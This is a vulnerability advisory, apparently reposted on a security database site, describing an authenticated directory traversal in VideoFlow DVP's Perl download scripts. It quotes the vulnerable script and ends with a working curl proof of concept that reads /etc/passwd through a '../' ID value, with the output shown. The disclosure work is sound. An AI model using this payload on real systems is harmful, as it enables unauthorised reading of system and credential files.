VideoFlow Digital Video Protection DVP 10 Authenticated Directory Traversal

2018.03.31
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

VideoFlow Digital Video Protection DVP 10 Authenticated Directory Traversal Vendor: VideoFlow Ltd. Product web page: http://www.video-flow.com Affected version: 2.10 (X-Prototype-Version: 1.6.0.2) System = Indicate if the DVP is configured as Protector, Sentinel or Fortress Version = The Operating System SW version number Image version = Production Image version System: DVP Protector Version: 1.40.0.15(R) May 5 2015 05:27:05 Image version: 3.07i System: DVP Protector Version: 1.40.0.15(R) May 5 2015 05:27:05 Image version: 2.08 System: DVP Fortress Version: 2.10.0.5(R) Jan 7 2018 03:26:35 Image version: 3.07 Summary: VideoFlow's Digital Video Protection (DVP) product is used by leading companies worldwide to boost the reliability of IP networks, including the public Internet, for professional live broadcast. DVP enables broadcast companies to confidently contribute and distribute live video over IP with unprecedented levels of service continuity, at a fraction of the cost of leased lines or satellite links. It accelerates ROI by reducing operational costs and enabling new revenue streams across a wide variety of markets. Desc: The application suffers from an authenticated arbitrary file disclosure vulnerability including no session expiration. Input passed via the 'ID' parameter in several Perl scripts is not properly verified before being used to download system files. This can be exploited to disclose the contents of arbitrary files via directory traversal attacks. Scripts affected: $ grep -rnH "Content-Disposition" . ./download.pl:30: print "Content-Disposition:attachment;filename=$ID\n\n"; ./download_xml.pl:23: print "Content-Disposition:attachment;filename=$ID\n\n"; ./downloadmib.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n"; ./downloadFile.pl:30: print "Content-Disposition:attachment;filename=$OUTNAME\n\n"; ./downloadsys.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n"; ---------------------------------------------------------------------------- /dvp100/confd/docroot/cgi-bin/downloadsys.pl: --------------------------------------------- 1 #!/usr/bin/perl -wT 2 # http://www.sitepoint.com/file-download-script-perl/ 3 4 use strict; 5 use CGI; 6 use CGI::Carp qw ( fatalsToBrowser ); 7 my $files_location; 8 my $query = CGI->new; 9 my $ID = $query->param('ID'); 10 my @fileholder; 11 12 $files_location = "/dvp100/confd/docroot/cgi-bin/"; 13 #$ID = "syslog.tar.gz"; #param('ID'); 14 15 if ($ID eq '') { 16 17 } else { 18 open(DLFILE, "<$files_location/$ID") || Error('open', 'file'); 19 @fileholder = <DLFILE>; 20 close (DLFILE) || Error ('close', 'file'); 21 print "Content-Type:application/x-download\n"; 22 print "Content-Disposition:attachment;filename=$ID\n\n"; 23 print @fileholder; 24 } ---------------------------------------------------------------------------- Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5) CentOS release 5.10 (Final) (2.6.18-371.el5) ConfD Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2018-5454 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php 01.02.2018 --- curl 'http://17.17.17.17/cgi-bin/downloadsys.pl?ID=../../../../etc/passwd' -H Cookie:sessionid=sess3638473331458218 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin ... ...

References:

https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top